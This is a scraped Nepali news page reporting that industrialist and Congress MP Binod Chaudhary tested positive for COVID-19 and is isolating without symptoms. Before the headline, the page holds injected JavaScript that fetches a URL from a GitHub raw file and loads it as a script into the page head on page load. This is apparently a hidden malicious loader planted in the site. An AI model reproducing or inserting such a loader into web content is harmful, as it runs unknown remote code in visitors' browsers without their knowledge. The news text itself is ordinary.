;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); उद्योगपति तथा कांग्रेस सांसद विनोद चौधरीलाई कोरोना संक्रमण पुष्टि – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • उद्योगपति तथा कांग्रेस सांसद विनोद चौधरीलाई कोरोना संक्रमण पुष्टि
राजनीति

उद्योगपति तथा कांग्रेस सांसद विनोद चौधरीलाई कोरोना संक्रमण पुष्टि

कोरोना

भदौ १२,

काठमाडौं । उद्योगपति एंव कांग्रेस सांसद विनोद चौधरीमा कोरोना संक्रमण पुष्टि भएको छ । उनले ट्वीट गर्दै कोरोना संक्रमण भएको जानकारी दिएका छन्। उनले आफनो आज (शुक्रबार) विहान पिसिआर रिपोर्ट पोजेटिभ आएका ट्वीटरमा लेखेका छन् ।

आफूलाई केही लक्षण नभएको र चिकित्सकको सल्लाहमा आइसोलेशनमा बसेको बताउँदै उनले आफूसँग सम्पर्कमा आएका व्यक्तित्वहरुलाई सावधानी अपनाउन आग्रह गरेका छन्। file Photo

फेसबुक प्रतिक्रियाहरु